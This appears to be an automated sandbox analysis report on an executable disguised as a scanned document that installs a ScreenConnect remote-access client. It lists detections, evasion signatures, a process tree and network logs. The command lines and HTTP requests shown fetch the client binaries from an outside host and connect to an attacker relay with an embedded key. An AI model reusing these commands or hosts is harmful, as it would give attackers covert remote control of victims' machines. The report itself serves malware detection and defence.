Windows Analysis Report
Scan_doc_09_16_24_1120.exe

Overview

General Information

Sample name: Scan_doc_09_16_24_1120.exe
Analysis ID: 1523878
MD5: 3d6752aea446d36e3078f6ae7c0490a1
SHA1: 71660374adf680ae661c675d1723bd5ab06c77a8
SHA256: 8626a972070c42a888f9372155d32cb05a3f9140d607136e4f5680fb32c2bd77
Tags: exe, filedn-com, user-JAMESWT_MHT
Infos:

Detection

ScreenConnect Tool
Score: 66
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Compliance

Score: 33
Range: 0 - 100

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to hide user accounts
Creates files in the system32 config directory
Enables network access during safeboot for specific services
Initial sample is a PE file and has a suspicious name
Reads the Security eventlog
Reads the System eventlog
AV process strings found (often used to terminate AV products)
Adds / modifies Windows certificates
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops certificate files (DER)
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
Modifies existing windows services
One or more processes crash
PE file contains an invalid checksum
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Dfsvc.EXE Network Connection To Uncommon Ports
Stores large binary data to the registry
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected ScreenConnect Tool

Classification

  • System is w10x64
  • Scan_doc_09_16_24_1120.exe (PID: 5572 cmdline: "C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exe" MD5: 3D6752AEA446D36E3078F6AE7C0490A1)
    • dfsvc.exe (PID: 1196 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe" MD5: B4088F44B80D363902E11F897A7BAC09)
      • ScreenConnect.WindowsClient.exe (PID: 7664 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe" MD5: 20AB8141D958A58AADE5E78671A719BF)
        • ScreenConnect.ClientService.exe (PID: 7700 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=ttyuio.zapto.org&p=8041&s=73549b67-726b-470e-ab1a-fbbb83a6a15b&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session" "1" MD5: 361BCC2CB78C75DD6F583AF81834E447)
    • WerFault.exe (PID: 4500 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5572 -s 684 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 5908 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 5672 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 5572 -ip 5572 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 2608 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 7204 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 7472 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • ScreenConnect.ClientService.exe (PID: 7724 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=ttyuio.zapto.org&p=8041&s=73549b67-726b-470e-ab1a-fbbb83a6a15b&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session" "1" MD5: 361BCC2CB78C75DD6F583AF81834E447)
    • ScreenConnect.WindowsClient.exe (PID: 7788 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe" "RunRole" "1714a821-0bba-4f94-9027-e5dd47ba7bd8" "User" MD5: 20AB8141D958A58AADE5E78671A719BF)
    • ScreenConnect.WindowsClient.exe (PID: 7172 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe" "RunRole" "be4104e4-6414-4af7-ae9c-6dc20c5434ce" "System" MD5: 20AB8141D958A58AADE5E78671A719BF)
  • cleanup
No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security | |
| C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security | |

| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| 0000000A.00000002.2285819740.000000001BC56000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security | |
| 00000001.00000002.2784738148.0000022707EC3000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security | |
| 00000001.00000002.2784738148.00000227081F6000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security | |
| 0000000A.00000000.2273256028.0000000000FF2000.00000002.00000001.01000000.0000000C.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security | |
| 0000000A.00000002.2284680562.00000000033A7000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security | |

| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| 10.0.ScreenConnect.WindowsClient.exe.ff0000.0.unpack | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security | |

                  System Summary

                  Source: Network Connection; Author: Nasreddine Bencherchali (Nextron Systems); Data: DestinationIp: 192.168.2.5, DestinationIsIpv6: false, DestinationPort: 49705, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Initiated: true, ProcessId: 1196, Protocol: tcp, SourceIp: 178.215.236.119, SourceIsIpv6: false, SourcePort: 443
                  Source: Process started; Author: vburov; Data: Command: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, ProcessId: 5908, ProcessName: svchost.exe
                  | Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
                  |---|---|---|---|---|---|---|---|---|
                  | 2024-10-02T06:23:00.190265+0200 | 2009897 | 1 | A Network Trojan was detected | 178.215.236.119 | 443 | 192.168.2.5 | 49722 | TCP |
                  | 2024-10-02T06:23:01.313130+0200 | 2009897 | 1 | A Network Trojan was detected | 178.215.236.119 | 443 | 192.168.2.5 | 49723 | TCP |
                  | 2024-10-02T06:23:05.234030+0200 | 2009897 | 1 | A Network Trojan was detected | 178.215.236.119 | 443 | 192.168.2.5 | 49729 | TCP |
                  | 2024-10-02T06:23:06.357364+0200 | 2009897 | 1 | A Network Trojan was detected | 178.215.236.119 | 443 | 192.168.2.5 | 49731 | TCP |
                  | 2024-10-02T06:23:07.756451+0200 | 2009897 | 1 | A Network Trojan was detected | 178.215.236.119 | 443 | 192.168.2.5 | 49734 | TCP |
                  | 2024-10-02T06:23:08.886579+0200 | 2009897 | 1 | A Network Trojan was detected | 178.215.236.119 | 443 | 192.168.2.5 | 49739 | TCP |
                  | 2024-10-02T06:23:11.300178+0200 | 2009897 | 1 | A Network Trojan was detected | 178.215.236.119 | 443 | 192.168.2.5 | 49742 | TCP |
                  | 2024-10-02T06:23:13.032777+0200 | 2009897 | 1 | A Network Trojan was detected | 178.215.236.119 | 443 | 192.168.2.5 | 49743 | TCP |

                  AV Detection

                  Source: Scan_doc_09_16_24_1120.exe; Virustotal: Detection: 13%
                  Source: Scan_doc_09_16_24_1120.exe; ReversingLabs: Detection: 18%
                  Source: Submitted Sample; Integrated Neural Analysis Model: Matched 87.0% probability
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exe; Code function: 0_2_00831000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00831000
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe; EXE: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe; EXE: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe; EXE: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe; EXE: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exe

                  Compliance

                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe; EXE: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe; EXE: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe; EXE: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe; EXE: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exe
                  Source: Scan_doc_09_16_24_1120.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: Scan_doc_09_16_24_1120.exe; Static PE information: certificate valid
                  Source: unknown; HTTPS traffic detected: 178.215.236.119:443 -> 192.168.2.5:49705 version: TLS 1.2
                  Source: Scan_doc_09_16_24_1120.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: dfsvc.exe, 00000001.00000002.2784738148.00000227082D0000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.00000227082E0000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.000002270806A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.0000022707F4C000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2284476507.0000000001852000.00000002.00000001.01000000.00000013.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb source: Scan_doc_09_16_24_1120.exe
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 00000001.00000002.2784738148.00000227082CC000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.0000022708353000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.000002270806A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.0000022707F47000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000B.00000002.2282591404.00000000024C2000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.WindowsClient.exe, 0000000D.00000002.3273020779.00000000023F1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000F.00000002.2941168266.00000000032F1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000F.00000002.2940865152.0000000003100000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.dll.1.dr, ScreenConnect.ClientService.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbe source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.2273256028.0000000000FF2000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 0000000B.00000000.2277621533.0000000000BCD000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 00000001.00000002.2784738148.0000022707F43000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.000002270806A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.000002270838D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.00000227082C8000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2286646662.000000001C312000.00000002.00000001.01000000.00000012.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.2273256028.0000000000FF2000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbW] source: dfsvc.exe, 00000001.00000002.2784738148.0000022707F43000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.000002270806A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.000002270838D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.00000227082C8000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2286646662.000000001C312000.00000002.00000001.01000000.00000012.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: dfsvc.exe, 00000001.00000002.2784738148.00000227082D0000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.00000227082E0000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.000002270806A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.0000022707F4C000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2284476507.0000000001852000.00000002.00000001.01000000.00000013.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 00000001.00000002.2784738148.000002270806A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.0000022707F3B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.000002270802E000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.0000022707EC3000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000B.00000002.2283012190.0000000004B32000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Core.dll.1.dr, ScreenConnect.Core.dll0.1.dr
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exe; Code function: 0_2_00834A4B FindFirstFileExA,0_2_00834A4B
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe; File opened: C:\Users\user\AppData\Local\Apps\2.0\
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe; File opened: C:\Users\user\AppData\Local\
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe; File opened: C:\Users\user\AppData\
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe; File opened: C:\Users\user\
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe; File opened: C:\Users\user\AppData\Local\Apps\
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe; File opened: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\

                  Networking

                  Source: Network traffic; Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 178.215.236.119:443 -> 192.168.2.5:49722
                  Source: Network traffic; Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 178.215.236.119:443 -> 192.168.2.5:49723
                  Source: Network traffic; Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 178.215.236.119:443 -> 192.168.2.5:49729
                  Source: Network traffic; Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 178.215.236.119:443 -> 192.168.2.5:49734
                  Source: Network traffic; Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 178.215.236.119:443 -> 192.168.2.5:49731
                  Source: Network traffic; Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 178.215.236.119:443 -> 192.168.2.5:49739
                  Source: Network traffic; Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 178.215.236.119:443 -> 192.168.2.5:49742
                  Source: Network traffic; Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 178.215.236.119:443 -> 192.168.2.5:49743
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe; Registry value created: NULL Service
                  Source: global traffic; TCP traffic: 192.168.2.5:49745 -> 178.215.236.119:8041
                  Source: global traffic; HTTP traffic detected: GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=ttyuio.zapto.org&p=8041&s=73549b67-726b-470e-ab1a-fbbb83a6a15b&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session HTTP/1.1; Host: cloudfiles-secure.io; Accept-Encoding: gzip; Connection: Keep-Alive
                  Source: global traffic; HTTP traffic detected: GET /Bin/ScreenConnect.Client.manifest HTTP/1.1; Host: cloudfiles-secure.io; Accept-Encoding: gzip
                  Source: global traffic; HTTP traffic detected: GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1; Host: cloudfiles-secure.io; Accept-Encoding: gzip; Connection: Keep-Alive
                  Source: global traffic; HTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1; Host: cloudfiles-secure.io; Accept-Encoding: gzip
                  Source: global traffic; HTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1; Host: cloudfiles-secure.io; Accept-Encoding: gzip
                  Source: global traffic; HTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1; Host: cloudfiles-secure.io; Accept-Encoding: gzip
                  Source: global traffic; HTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1; Host: cloudfiles-secure.io; Accept-Encoding: gzip
                  Source: global traffic; HTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1; Host: cloudfiles-secure.io; Accept-Encoding: gzip
                  Source: global traffic; HTTP traffic detected: GET /Bin/ScreenConnect.Client.dll HTTP/1.1; Host: cloudfiles-secure.io; Accept-Encoding: gzip
                  Source: global traffic; HTTP traffic detected: GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1; Host: cloudfiles-secure.io; Accept-Encoding: gzip
                  Source: global traffic; HTTP traffic detected: GET /Bin/ScreenConnect.Windows.dll HTTP/1.1; Host: cloudfiles-secure.io; Accept-Encoding: gzip
                  Source: global traffic; HTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1; Host: cloudfiles-secure.io; Accept-Encoding: gzip
                  Source: global traffic; HTTP traffic detected: GET /Bin/ScreenConnect.Core.dll HTTP/1.1; Host: cloudfiles-secure.io; Accept-Encoding: gzip
                  Source: Joe Sandbox View; IP Address: 178.215.236.119
                  Source: Joe Sandbox View; ASN Name: LVLT-10753US
                  Source: Joe Sandbox View; JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global traffic; DNS traffic detected: DNS query: cloudfiles-secure.io
                  Source: global traffic; DNS traffic detected: DNS query: ttyuio.zapto.org
                  Source: svchost.exe, 00000007.00000003.2156243757.0000022265375000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2165857970.0000022265379000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2156320828.0000022265374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3272112459.0000022265337000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2165831029.0000022265376000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3272173508.000002226535F000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://Passport.NET/STS
                  Source: svchost.exe, 00000007.00000002.3272173508.000002226535F000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsd
